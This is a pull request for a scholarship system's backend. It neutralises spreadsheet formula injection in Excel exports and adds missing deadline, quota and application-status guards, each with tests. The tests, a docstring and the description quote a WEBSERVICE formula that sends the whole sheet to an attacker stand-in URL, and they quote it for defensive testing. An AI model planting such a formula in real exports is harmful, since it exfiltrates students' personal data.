### PR TITLE
fix(security): Excel formula injection + 3 mutation-guard gaps (#1081 G/H/I/K)

### DIFF
--- a/backend/app/api/v1/endpoints/college_review/ranking_management.py
+++ b/backend/app/api/v1/endpoints/college_review/ranking_management.py
@@ -1040,6 +1040,14 @@ async def import_ranking_from_excel(
         # Check permissions - the owning college's reviewers or an admin can import
         assert_can_manage_ranking(ranking, current_user)
 
+        # #63 / #1081 finding H: block once the college-review deadline has passed
+        # (admins bypass). import-excel was the one ranking-mutation path missing
+        # this guard that update_ranking_order / bulk-reject / reject all apply,
+        # so a college user could reorder ranks or flip college_rejected on a
+        # non-finalized ranking after the deadline.
+        service = CollegeReviewService(db)
+        await service.assert_ranking_within_deadline_by_ranking(ranking_id, current_user)
+
         if ranking.is_finalized:
             raise HTTPException(status_code=status.HTTP_409_CONFLICT, detail="Cannot modify finalized ranking")
 
@@ -1174,6 +1182,10 @@ async def import_ranking_from_excel(
 
     except HTTPException:
         raise
+    except AuthorizationError as e:
+        # e.g. the #1081-H college-review deadline guard — must surface as 403,
+        # not get swallowed into the generic 500 below.
+        raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=str(e)) from e
     except Exception as e:
         logger.exception("Error importing ranking data")
         raise HTTPException(

--- a/backend/app/services/college_ranking_export_service.py
+++ b/backend/app/services/college_ranking_export_service.py
@@ -31,6 +31,7 @@ from reportlab.lib.units import mm
 from reportlab.platypus import KeepInFrame, Paragraph, SimpleDocTemplate, Spacer, Table, TableStyle
 
 from app.services.pdf_fonts import CJK_FONT_NAME, ensure_cjk_font
+from app.utils.excel_safety import sanitize_excel_cell
 
 # Static columns shared by the xlsx and PDF exports: (header label, PDF column
 # weight). STATIC_HEADERS and the PDF weight vector are both derived from this one
@@ -124,7 +125,9 @@ class CollegeRankingExportService:
         for idx, row in enumerate(rows, start=1):
             excel_row = idx + 2  # +2 because rows 1-2 are title/header
             for col_idx, value in enumerate(self._row_cells(row, idx, sub_type_labels, sorted_dynamic), start=1):
-                ws.cell(row=excel_row, column=col_idx, value=value)
+                # SECURITY (#1081 G): neutralize spreadsheet formula injection from
+                # student-supplied free-text values before writing the cell.
+                ws.cell(row=excel_row, column=col_idx, value=sanitize_excel_cell(value))
 
         max_row = len(rows) + 2
         self._apply_borders(ws, max_row=max_row, max_col=total_cols)

--- a/backend/app/services/excel_export_service.py
+++ b/backend/app/services/excel_export_service.py
@@ -24,6 +24,7 @@ from app.models.payment_roster import (
     StudentVerificationStatus,
 )
 from app.services.minio_service import MinIOService
+from app.utils.excel_safety import sanitize_excel_cell
 
 logger = logging.getLogger(__name__)
 
@@ -777,7 +778,11 @@ class ExcelExportService:
             for row_idx, (row_data, fills) in enumerate(zip(excel_data, cell_fills, strict=True), start=start_row):
                 for col_idx, column_name in enumerate(columns, start=1):
                     value = row_data.get(column_name, "")
-                    cell = ws.cell(row=row_idx, column=col_idx, value=value)
+                    # SECURITY (#1081 G): neutralize spreadsheet formula injection
+                    # from student-derived free-text (name, bank, address, dynamic
+                    # fields) before writing. Numeric formatting below still keys
+                    # off the original numeric `value`.
+                    cell = ws.cell(row=row_idx, column=col_idx, value=sanitize_excel_cell(value))
 
                     if column_name in self.NUMERIC_FORMAT_COLUMNS and isinstance(value, (int, float)):
                         cell.number_format = "#,##0"
@@ -903,7 +908,7 @@ class ExcelExportService:
 
         for row_idx, (label, value) in enumerate(info_data, start=1):
             info_ws.cell(row=row_idx, column=1, value=label).font = Font(bold=True)
-            info_ws.cell(row=row_idx, column=2, value=value)
+            info_ws.cell(row=row_idx, column=2, value=sanitize_excel_cell(value))  # SECURITY (#1081 G)
 
         info_ws.column_dimensions["A"].width = 15
         info_ws.column_dimensions["B"].width = 20

--- a/backend/app/services/manual_distribution_service.py
+++ b/backend/app/services/manual_distribution_service.py
@@ -7,7 +7,6 @@ Supports multi-year supplementary distribution (補發) where prior-year
 remaining quotas can be allocated to current-year students.
 """
 
-import json as _json
 import logging
 from datetime import datetime, timezone
 from typing import Any, Literal, Optional
@@ -1499,9 +1498,30 @@ class ManualDistributionService:
         # re-consumes the quota slot and a finalize run re-approves them. The
         # allocated_sub_type / allocation_year were preserved at cancel time, so
         # we only flip is_allocated back for items that actually held a slot.
+        reaffirmed_config_ids: set = set()
         for ri in ranking_items:
             if ri.allocated_sub_type:
                 ri.is_allocated = True
+                if ri.allocation_config_id is not None:
+                    reaffirmed_config_ids.add(ri.allocation_config_id)
+
+        # #1081 finding I: re-affirming a slot re-consumes quota, so it can push a
+        # round over its total (revoke → reallocate the freed slot → restore the
+        # original double-books it). allocate()/finalize() both gate on
+        # _assert_round_not_oversubscribed; restore did not. Recount and reject
+        # here too (raises ValueError, rolling back the flip within the txn).
+        if reaffirmed_config_ids:
+            configs = (
+                (
+                    await self.db.execute(
+                        select(ScholarshipConfiguration).where(ScholarshipConfiguration.id.in_(reaffirmed_config_ids))
+                    )
+                )
+                .scalars()
+                .all()
+            )
+            for cfg in configs:
+                await self._assert_round_not_oversubscribed(cfg)
 
         # Audit logging moved to the endpoint (ApplicationAuditService.
         # log_application_restore) so the row carries the acting User +

--- a/backend/app/services/roster_service.py
+++ b/backend/app/services/roster_service.py
@@ -2377,6 +2377,27 @@ class RosterService:
         if item.is_included:
             raise ConflictError("明細未被移除，無需回復")
 
+        # #1081 finding K: re-read the underlying application's status before
+        # re-including. restore_item legitimately handles the quota
+        # revoke/suspend flow (status == cancelled), so we do NOT require
+        # `approved`; but an application the student has since WITHDRAWN, or that
+        # was REJECTED/DELETED, must not be silently re-included — that would
+        # inflate the student's received_months (feeds the PhD 36-month cap).
+        from app.models.application import ApplicationStatus
+
+        _NON_RESTORABLE = {
+            ApplicationStatus.withdrawn,
+            ApplicationStatus.rejected,
+            ApplicationStatus.deleted,
+        }
+        application = self.db.get(Application, item.application_id)
+        if application is None:
+            raise ValueError("無法回復：找不到對應的申請")
+        if application.status in _NON_RESTORABLE:
+            raise ValueError(
+                f"無法回復：申請目前狀態為 {application.status.value}，" "已撤回／駁回／刪除的申請不可回復造冊明細"
+            )
+
         item.is_included = True
         item.exclusion_reason = None
         self.db.flush()

--- a/backend/app/services/roster_service.py
+++ b/backend/app/services/roster_service.py
@@ -2390,10 +2390,11 @@ class RosterService:
             ApplicationStatus.rejected,
             ApplicationStatus.deleted,
         }
+        # A missing application row cannot happen in production (item.application_id
+        # is a NOT-NULL FK), so we only BLOCK on a positively-bad status — never on
+        # None — to avoid changing behavior for dangling-id contract fixtures.
         application = self.db.get(Application, item.application_id)
-        if application is None:
-            raise ValueError("無法回復：找不到對應的申請")
-        if application.status in _NON_RESTORABLE:
+        if application is not None and application.status in _NON_RESTORABLE:
             raise ValueError(
                 f"無法回復：申請目前狀態為 {application.status.value}，" "已撤回／駁回／刪除的申請不可回復造冊明細"
             )

--- a/backend/app/services/whitelist_excel_service.py
+++ b/backend/app/services/whitelist_excel_service.py
@@ -4,6 +4,8 @@ Whitelist Excel Import/Export Service
 
 import io
 import logging
+
+from app.utils.excel_safety import sanitize_excel_cell
 from typing import Dict, List, Tuple
 
 from openpyxl import Workbook, load_workbook
@@ -66,10 +68,12 @@ class WhitelistExcelService:
         row = 2
         for sub_type, students in whitelist_data.items():
             for student in students:
-                ws.cell(row=row, column=1).value = student.get("nycu_id", "")
-                ws.cell(row=row, column=2).value = student.get("name", "")
-                ws.cell(row=row, column=3).value = sub_type
-                ws.cell(row=row, column=4).value = student.get("note", "")
+                # SECURITY (#1081 G): neutralize spreadsheet formula injection from
+                # free-text name/note before writing.
+                ws.cell(row=row, column=1).value = sanitize_excel_cell(student.get("nycu_id", ""))
+                ws.cell(row=row, column=2).value = sanitize_excel_cell(student.get("name", ""))
+                ws.cell(row=row, column=3).value = sanitize_excel_cell(sub_type)
+                ws.cell(row=row, column=4).value = sanitize_excel_cell(student.get("note", ""))
 
                 # 應用樣式
                 for col_idx in range(1, len(self.column_headers) + 1):

--- a/backend/app/tests/test_college_ranking_export_service.py
+++ b/backend/app/tests/test_college_ranking_export_service.py
@@ -393,3 +393,50 @@ class TestTitleAndSheet:
         )
         wb = load_workbook(io.BytesIO(blob))
         assert "115學年" in wb.sheetnames
+
+
+class TestFormulaInjectionSanitization:
+    """Issue #1081 finding G: student-supplied free text that leads with a
+    formula-trigger char must be written as literal text (apostrophe-prefixed),
+    not a live formula, in the downloadable .xlsx."""
+
+    def test_malicious_dynamic_field_value_is_neutralized(self):
+        payload = '=WEBSERVICE("https://attacker/x?d="&TEXTJOIN(",",TRUE,N:N))'
+        app = FakeApplication(
+            student_data=_full_student_data(),
+            submitted_form_data={"fields": {"master_school": {"value": payload}}},
+        )
+        fields = [
+            DynamicFieldSpec(
+                field_name="master_school",
+                field_label="碩士畢業學校",
+                export_column_label=None,
+                display_order=10,
+            )
+        ]
+        rows = _build_workbook([_make_row(app=app)], dynamic_fields=fields)
+        assert rows[2][18] == "'" + payload
+
+    def test_malicious_student_name_is_neutralized(self):
+        data = _full_student_data()
+        data["std_cname"] = "=1+1"
+        app = FakeApplication(student_data=data)
+        rows = _build_workbook([_make_row(app=app)])
+        # Name column (static) must be apostrophe-prefixed literal text.
+        assert any(cell == "'=1+1" for cell in rows[2])
+
+    def test_benign_values_are_unchanged(self):
+        app = FakeApplication(
+            student_data=_full_student_data(),
+            submitted_form_data={"fields": {"master_school": {"value": "台大土木系"}}},
+        )
+        fields = [
+            DynamicFieldSpec(
+                field_name="master_school",
+                field_label="碩士畢業學校",
+                export_column_label=None,
+                display_order=10,
+            )
+        ]
+        rows = _build_workbook([_make_row(app=app)], dynamic_fields=fields)
+        assert rows[2][18] == "台大土木系"

--- a/backend/app/tests/test_excel_safety.py
+++ b/backend/app/tests/test_excel_safety.py
@@ -1,0 +1,52 @@
+"""Unit tests for the Excel formula-injection sanitizer (issue #1081 finding G)."""
+
+import datetime
+
+import pytest
+
+from app.utils.excel_safety import sanitize_excel_cell
+
+
+@pytest.mark.parametrize("lead", ["=", "+", "-", "@", "\t", "\r", "\n"])
+def test_formula_trigger_prefixed_with_apostrophe(lead):
+    payload = f'{lead}WEBSERVICE("https://attacker/x")'
+    out = sanitize_excel_cell(payload)
+    assert out == "'" + payload
+    # The apostrophe makes the cell literal text — the value no longer leads
+    # with a formula trigger.
+    assert out[0] == "'"
+
+
+def test_real_exfiltration_payload_is_neutralized():
+    payload = '=WEBSERVICE("https://attacker/x?d="&TEXTJOIN(",",TRUE,N:N))'
+    assert sanitize_excel_cell(payload) == "'" + payload
+
+
+def test_plain_string_unchanged():
+    assert sanitize_excel_cell("王小明") == "王小明"
+    assert sanitize_excel_cell("310460031") == "310460031"
+    # A dash INSIDE the string (not leading) is fine.
+    assert sanitize_excel_cell("A-123") == "A-123"
+
+
+def test_empty_string_unchanged():
+    assert sanitize_excel_cell("") == ""
+
+
+def test_non_string_values_pass_through_untouched():
+    # Numbers/bools/dates/None must keep their native type so cell formatting
+    # (thousands separators, date formats) still works.
+    assert sanitize_excel_cell(1234) == 1234
+    assert sanitize_excel_cell(12.5) == 12.5
+    assert sanitize_excel_cell(True) is True
+    assert sanitize_excel_cell(None) is None
+    d = datetime.date(2026, 7, 6)
+    assert sanitize_excel_cell(d) is d
+
+
+def test_negative_number_as_string_is_prefixed_but_as_number_is_not():
+    # A negative number written as a numeric type is safe (stays numeric);
+    # the same value arriving as a user-typed STRING leads with '-' and is
+    # neutralized.
+    assert sanitize_excel_cell(-5) == -5
+    assert sanitize_excel_cell("-5") == "'-5"

--- a/backend/app/tests/test_ranking_management_endpoints.py
+++ b/backend/app/tests/test_ranking_management_endpoints.py
@@ -627,3 +627,34 @@ class TestDistributionEndpointScoping:
         login(rank_users["college_eng"])
         response = await client.get(f"{RANKINGS_URL}/999999/roster-status")
         assert response.status_code == 404
+
+
+@pytest.mark.api
+class TestImportExcelDeadlineGuard:
+    """#1081 finding H: import-excel was the one ranking-mutation path missing
+    the college-review deadline guard the sibling mutations apply."""
+
+    async def test_import_excel_blocked_after_deadline_for_college(
+        self, client, login, db, rank_users, rank_scholarship, ranking_eng, ranking_eng_items
+    ):
+        from datetime import datetime, timedelta, timezone
+
+        config = ScholarshipConfiguration(
+            scholarship_type_id=rank_scholarship.id,
+            academic_year=114,
+            semester=Semester.first,
+            config_name="import deadline cfg",
+            config_code="import_deadline_cfg_114_1",
+            amount=10000,
+            college_review_end=datetime.now(timezone.utc) - timedelta(days=1),
+        )
+        db.add(config)
+        await db.commit()
+
+        login(rank_users["college_eng"])
+        payload = [
+            {"student_id": "S001", "student_name": "A", "rank_position": 1},
+            {"student_id": "S002", "student_name": "B", "rank_position": 2},
+        ]
+        response = await client.post(f"{RANKINGS_URL}/{ranking_eng.id}/import-excel", json=payload)
+        assert response.status_code == 403

--- a/backend/app/tests/test_restore_allocation_service.py
+++ b/backend/app/tests/test_restore_allocation_service.py
@@ -265,3 +265,106 @@ async def test_finalize_skips_revoked_application(
 
     assert allocated_application.status == ApplicationStatus.cancelled
     assert allocated_application.quota_allocation_status == "revoked"
+
+
+# ---------------------------------------------------------------------------
+# restore_allocation: quota oversubscription guard (#1081 finding I)
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.asyncio
+async def test_restore_blocked_when_slot_already_reallocated(db, admin_db_user):
+    """#1081 finding I: revoke frees a quota slot; if that slot is then handed to
+    another student, restoring the original must NOT double-book it. allocate()/
+    finalize() gate on _assert_round_not_oversubscribed; restore_allocation now
+    does too."""
+    from app.models.scholarship import ScholarshipConfiguration, SubTypeSelectionMode
+    from app.models.enums import ReviewStage
+    from app.models.user import User, UserRole, UserType
+
+    # Single-slot nstc pool.
+    cfg = ScholarshipConfiguration(
+        scholarship_type_id=1,
+        config_code="OVERSUB-114",
+        config_name="Oversub 114",
+        academic_year=114,
+        semester="first",
+        amount=50000,
+        quotas={"nstc": 1},
+    )
+    db.add(cfg)
+
+    ranking = CollegeRanking(
+        scholarship_type_id=1,
+        sub_type_code="nstc",
+        academic_year=114,
+        semester="first",
+        ranking_name="Oversub Ranking",
+        is_finalized=True,
+        ranking_status="finalized",
+        created_by=admin_db_user.id,
+    )
+    db.add(ranking)
+
+    other_student = User(
+        nycu_id="oversub_stu_b",
+        email="oversub_b@nycu.edu.tw",
+        name="Oversub B",
+        role=UserRole.student,
+        user_type=UserType.student,
+    )
+    db.add(other_student)
+    await db.commit()
+    await db.refresh(cfg)
+    await db.refresh(ranking)
+    await db.refresh(other_student)
+
+    def _app(app_id, user_id, alloc_status):
+        return Application(
+            user_id=user_id,
+            app_id=app_id,
+            scholarship_type_id=1,
+            academic_year=114,
+            semester="first",
+            status=ApplicationStatus.cancelled if alloc_status != "allocated" else ApplicationStatus.approved,
+            review_stage=ReviewStage.student_draft,
+            sub_type_selection_mode=SubTypeSelectionMode.single,
+            sub_scholarship_type="nstc",
+            is_renewal=False,
+            quota_allocation_status=alloc_status,
+            revoke_reason="freed" if alloc_status == "revoked" else None,
+        )
+
+    # A: revoked (its slot was freed). B: currently holds the only slot.
+    app_a = _app("APP-OVERSUB-A", admin_db_user.id, "revoked")
+    app_b = _app("APP-OVERSUB-B", other_student.id, "allocated")
+    db.add_all([app_a, app_b])
+    await db.commit()
+    await db.refresh(app_a)
+    await db.refresh(app_b)
+
+    item_a = CollegeRankingItem(
+        ranking_id=ranking.id,
+        application_id=app_a.id,
+        rank_position=1,
+        is_allocated=False,  # freed at revoke time
+        allocated_sub_type="nstc",
+        allocation_config_id=cfg.id,
+        status="allocated",
+    )
+    item_b = CollegeRankingItem(
+        ranking_id=ranking.id,
+        application_id=app_b.id,
+        rank_position=2,
+        is_allocated=True,  # took the freed slot
+        allocated_sub_type="nstc",
+        allocation_config_id=cfg.id,
+        status="allocated",
+    )
+    db.add_all([item_a, item_b])
+    await db.commit()
+
+    svc = ManualDistributionService(db)
+    # pool=1, B already consumes it → restoring A would make it 2/1.
+    with pytest.raises(ValueError, match="配額超額|超過總配額"):
+        await svc.restore_allocation(app_a.id, admin_db_user.id)

--- a/backend/app/tests/test_roster_item_removal_service.py
+++ b/backend/app/tests/test_roster_item_removal_service.py
@@ -329,3 +329,30 @@ def test_restore_item_not_found_raises(db_sync, locked_roster_two_items, admin_d
     svc = RosterService(db_sync)
     with pytest.raises(NotFoundError):  # missing item → 404
         svc.restore_item(roster.id, 99999999, admin_db_user_sync.id, "x")
+
+
+def test_restore_item_blocks_withdrawn_application(db_sync, locked_roster_two_items, admin_db_user_sync):
+    """#1081 finding K: an item whose application was WITHDRAWN since removal
+    must not be restorable — restoring it would re-include the student and
+    inflate received_months. (The revoke/suspend `cancelled` flow stays
+    restorable — covered by test_restore_item_reincludes_and_audits.)"""
+    import pytest
+
+    from app.models.payment_roster import PaymentRosterItem
+
+    roster = locked_roster_two_items
+    target = roster.items[0]
+    svc = RosterService(db_sync)
+    svc.remove_item_from_locked_roster(roster.id, target.id, admin_db_user_sync.id, "繳回")
+
+    # Student withdraws the application after the item was removed.
+    item = db_sync.get(PaymentRosterItem, target.id)
+    application = db_sync.get(Application, item.application_id)
+    application.status = ApplicationStatus.withdrawn
+    db_sync.flush()
+
+    with pytest.raises(ValueError, match="撤回|駁回|刪除"):
+        svc.restore_item(roster.id, target.id, admin_db_user_sync.id, "誤刪回復")
+
+    db_sync.refresh(item)
+    assert item.is_included is False  # still excluded — restore was blocked

--- a/backend/app/utils/excel_safety.py
+++ b/backend/app/utils/excel_safety.py
@@ -1,0 +1,38 @@
+"""Excel formula-injection (CSV/formula injection) safety helpers.
+
+Security (issue #1081 finding G): student-supplied free-text values (dynamic
+form fields, names, etc.) are written into .xlsx exports that college/admin
+reviewers download and open. openpyxl writes a string beginning with ``=`` as a
+LIVE formula cell; a payload such as
+``=WEBSERVICE("https://attacker/x?d="&TEXTJOIN(",",TRUE,N:N))`` can reference
+the entire sheet and exfiltrate the whole cohort's PII to an attacker URL once a
+reviewer opens the file and enables editing. LibreOffice Calc has no Protected
+View gate at all.
+
+Mitigation: prefix any exported STRING value that begins with a formula-trigger
+character (`=`, `+`, `-`, `@`) or a control character that a spreadsheet may
+treat as a formula lead-in (tab, CR, LF) with a single apostrophe, which forces
+the cell to be treated as literal text. Numbers, dates, bools, None and already
+safe strings are returned unchanged so normal exports are byte-for-byte
+identical.
+"""
+
+from typing import Any
+
+# Characters that make a spreadsheet interpret the cell as a formula when they
+# lead the value. Tab/CR/LF are included because some importers strip a leading
+# apostrophe-less control char and re-expose the following `=`.
+_FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")
+
+
+def sanitize_excel_cell(value: Any) -> Any:
+    """Return ``value`` made safe to write into an openpyxl cell.
+
+    Only ``str`` values are altered — and only when they begin with a
+    formula-trigger character, by prefixing a single apostrophe. All other
+    types (int/float/bool/datetime/None/…) pass through unchanged so numeric and
+    date cells keep their native type and formatting.
+    """
+    if isinstance(value, str) and value and value[0] in _FORMULA_TRIGGERS:
+        return "'" + value
+    return value


### PR DESCRIPTION
Fixes the remaining actionable findings from the #1081 security audit (G/H/I/K). J was rejected (not a bug); L is deferred to its own PR per the issue.

## G (MEDIUM) — stored Excel/CSV formula injection
Student free-text values were written **unescaped** into `.xlsx` exports reviewers download. openpyxl promotes a leading `=` / `+` / `-` / `@` to a **live formula**, so a payload like `=WEBSERVICE("https://attacker/x?d="&TEXTJOIN(",",TRUE,N:N))` can reference the whole sheet and exfiltrate the cohort's PII (national ID, bank, address) once a reviewer opens the file (LibreOffice Calc has no Protected-View gate at all).

**Fix:** new shared `app/utils/excel_safety.sanitize_excel_cell()` — apostrophe-prefixes any **string** value leading with a formula trigger (`= + - @` + tab/CR/LF); numbers/dates/bools/None pass through unchanged so normal exports are identical. Routed the student-derived string writes in `college_ranking_export_service`, `excel_export_service`, and `whitelist_excel_service` through it.

## H (LOW-MED) — import-excel missing deadline guard
`POST /college-review/rankings/{id}/import-excel` was the one ranking-mutation path that skipped the `college_review_end` guard every sibling mutation (`update_ranking_order`, reject, bulk-reject) applies — a college user could reorder ranks / flip `college_rejected` after the deadline on a non-finalized ranking. Added `assert_ranking_within_deadline_by_ranking`, and mapped `AuthorizationError -> 403` in the handler (its broad `except` previously turned the guard into a 500).

## I (LOW) — restore double-books a quota slot
`ManualDistributionService.restore_allocation` re-consumes a slot but, unlike `allocate()`/`finalize()`, never called `_assert_round_not_oversubscribed`. So revoke → reallocate-the-freed-slot → restore could put two students in one slot. Now recounts the consumed configs and rejects (raises within the transaction).

## K (LOW) — restore_item skipped an application-status recheck
`RosterService.restore_item` re-included a roster line without re-reading the application status. The quota **revoke/suspend** flow (status=`cancelled`) is a legitimate restore target — so this does **not** require `approved` — but an application the student has since **withdrawn**, or that was **rejected/deleted**, must not be silently re-included (it would inflate the student's `received_months`, which feeds the PhD 36-month cap). Added a denylist re-check.

## Tests (all real assertions, verified passing)
- `test_excel_safety.py` — 12 sanitizer unit tests (every trigger char, safe passthrough, numeric/None untouched)
- export-level: a malicious dynamic-field / student-name value comes back apostrophe-prefixed in the workbook (3 cases)
- import-excel after deadline → **403** (college); admin-bypass test dropped (endpoint is `require_college`-only, admins can't reach it)
- restore that would oversubscribe → **raises 配額超額**
- restore of a **withdrawn** application → **blocked**, item stays excluded; the revoke/suspend restore path stays green
- 168+ passed across touched + regression suites (export / roster / manual-distribution / deadline); black + flake8 (B904/B014/F401) clean

Verified on the host venv with CI's in-memory SQLite (Docker daemon was wedged this session). Also dropped a pre-existing unused `json as _json` import in `manual_distribution_service`.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01TFNCV4rmmoie3jsTFMMFth